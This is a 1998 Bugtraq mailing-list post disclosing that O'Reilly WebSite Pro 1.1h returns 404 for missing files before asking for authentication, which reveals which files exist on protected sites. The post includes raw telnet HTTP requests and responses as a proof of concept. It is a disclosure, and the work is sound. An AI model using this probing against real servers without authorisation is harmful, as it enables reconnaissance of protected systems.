Bugtraq mailing list archives

Flaw in HTTP-Authentication in O'Reilly Website Pro

From: bk () arena cwnet com (BarKode)
Date: Fri, 24 Apr 1998 03:14:02 +0000


Greetings...

        I went to download a file I'd stashed away on a machine at work
running Website Pro 1.1h, with HTTP-Authentication required to
access the site at all.  I mistyped the name and to my astonishment
got a 404 error. This only surprised me because I had just started
the browser, and had not yet been prompted for a username and
password (Authentication-basic style).

Problem: You can remotely check for existence of files and
directory structures on a machine running Web Site Pro 1.1.

Observe: Here we will try to access index.html, a file which exists on
the protected host.
thunder:~$ telnet protected.host.com 80
Trying 1.2.3.4...
Connected to protected.host.com.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 401 Unauthorized
Date: Fri, 24 Apr 1998 09:33:46 GMT
Server: WebSitePro/1.1h
Accept-ranges: bytes
WWW-Authenticate: Basic realm="Web Server"
Content-length: 156


<HTML><HEAD><TITLE>Authorization Required</TITLE></HEAD>
<BODY><H1>Authorization Required</H1>
Authentication (Basic) failed or was missing.
</BODY></HTML>
Connection closed by foreign host.

******

Now we try to access a file that does *not* exist.

thunder:~$ telnet protected.host.com 80
Trying 1.2.3.4...
Connected to protected.host.com.
Escape character is '^]'.
GET /nothere.html HTTP/1.0

HTTP/1.0 404 Not Found
Date: Fri, 24 Apr 1998 09:35:42 GMT
Server: WebSitePro/1.1h
Accept-ranges: bytes
Content-type: text/html
Content-length: 207


<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY><H1>404 Not Found</H1>
The requested URL was not found on this
server:<P><CODE>/nothere.html<P>(C:/WebS
ite/htdocs/nothere.html)</CODE><P> </BODY></HTML>
Connection closed by foreign host.

*****

No mention whatsoever of Authentication, the server spewed forth a
404 document, gleefully stating the file we want isn't there. The
same situation posed under Apache 1.2.5 returns a '401 Unauthorized'
in either situation.

Contacted O'Reilly, awaiting response....

-Matt

Current thread:

More Microsoft debri Lloyd Vancil (Apr 23)
- <Possible follow-ups>
- Re: More Microsoft debri Michael Howard (Apr 23)
  - Re: More Microsoft debri pedward () WEBCOM COM (Apr 23)
    - Re: More Microsoft debri James E. Robinson, III (Apr 23)
  - Another Frontpage Bug, with promiscuous ScriptAliases pedward () WEBCOM COM (Apr 23)
    - Flaw in HTTP-Authentication in O'Reilly Website Pro BarKode (Apr 23)
    - Re: Another Frontpage Bug, with promiscuous ScriptAliases Marc Slemko (Apr 23)
    - How to exploit AlephOne by JP of AntiOnline F0RMiCA (Apr 24)
    - Security Hole in Netscape Enterprise Server 3.0 Daragh Malone (Apr 24)
    - Re: Security Hole in Netscape Enterprise Server 3.0 Matthew Frederick (Apr 24)
    - How to exploit mudge by AlephOne by JP AntiOnline Dr. Mudge (Apr 24)
    - Re: How to exploit mudge by AlephOne by JP AntiOnline Aleph One (Apr 24)